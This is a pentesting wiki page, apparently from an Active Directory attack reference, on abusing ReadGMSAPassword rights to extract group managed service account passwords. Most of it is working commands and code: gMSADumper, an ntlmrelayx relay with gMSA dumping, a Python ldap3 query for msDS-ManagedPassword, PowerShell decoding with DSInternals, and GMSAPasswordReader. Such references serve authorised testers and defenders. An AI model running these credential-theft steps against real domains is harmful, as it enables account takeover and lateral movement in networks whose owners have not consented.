ReadGMSAPassword
This abuse can be carried out when controlling an object that has, for instance, AllExtendedRights over a target computer.
The attacker can read the gMSA (group managed service accounts) password of the account.
UNIX-like
Windows
On UNIX-like systems, gMSADumper (Python) can be used to read and decode gMSA passwords. It supports cleartext NTLM, pass-the-hash and Kerberoas authentications.
1
gMSADumper.py -u 'user' -p 'password' -d 'domain.local'
Copied!
โ€‹
Alternative #1: Impacket's ntlmrelayx tool can be used to read and decode gMSA passwords.
1
ntlmrelayx.py -t ldaps://10.0.0.5 -debug --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs
Copied!
In order to easily fake a relayed authentication, once the relay servers are up and running, the tester can browse http://127.0.0.1/ in order to trigger a basic authentication that will then be relayed by ntlmrelayx, like this.
โ€‹
Alternative #2: The msDS-ManagedPassword attribute can also be manually obtained by running the following Python script. The following code can then be used to decode the blob.
1
import ldap3
2
target_dn = "" # something like 'CN=Target User,OU=Standard Accounts,DC=domain,DC=local'
3
domain = "domain"
4
username = "username"
5
user = "{}\\{}".format(domain, username)
6
password = "password"
7
server = ldap3.Server(domain)
8
connection = ldap3.Connection(server = server, user = user, password = password, authentication = NTLM)
9
connection.bind()
10
connection.search(target_dn, '(&(ObjectClass=msDS-GroupManagedServiceAccount))', search_scope=SUBTREE, attributes=['sAMAccountName','msDS-ManagedPassword'])
11
print(connection.entries)
Copied!
On Windows systems, there are multiple ways to read gMSA passwords.
The first one uses the Active Directory and DSInternals PowerShell modules.
1
# Save the blob to a variable
2
$gmsa = Get-ADServiceAccount -Identity 'Target_Account' -Properties 'msDS-ManagedPassword'
3
$mp = $gmsa.'msDS-ManagedPassword'
4
โ€‹
5
# Decode the data structure using the DSInternals module
6
ConvertFrom-ADManagedPasswordBlob $mp
Copied!
The second one relies on GMSAPasswordReader (C#).
1
.\GMSAPasswordReader.exe --AccountName 'Target_Account'
Copied!
Last modified 1mo ago
Copy link